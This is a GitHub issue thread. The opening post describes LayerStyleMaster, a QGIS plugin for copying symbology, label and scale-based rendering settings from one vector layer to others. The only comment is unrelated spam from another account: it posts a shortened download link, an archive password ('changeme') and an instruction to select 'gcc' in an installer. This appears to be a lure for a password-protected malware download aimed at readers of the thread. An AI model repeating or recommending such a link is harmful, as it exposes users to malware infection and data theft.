### ISSUE TITLE
Layer Style Master

### ISSUE THREAD

**Issue by Ahmadsj2024** [Ahmadsj2024/Layer-Style-Master#1]
LayerStyleMaster is a QGIS plugin designed to streamline the process of managing and applying styling across multiple vector layers. With this plugin, users can easily copy and apply various layer properties from a source layer to one or more target layers. Specifically, the plugin allows users to:

Symbology: Copy the visual styling, including colors, symbols, and styles, from a source layer to target layers.
Labels: Transfer label settings such as text formatting, placement, buffer, shadow, and scale-based visibility.
Rendering: Apply scale-based rendering settings to ensure consistent visibility of layers across different map scales.
This tool enhances efficiency by automating the application of complex styling configurations, making it easier to maintain consistency in visual representation across multiple layers in a QGIS project.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
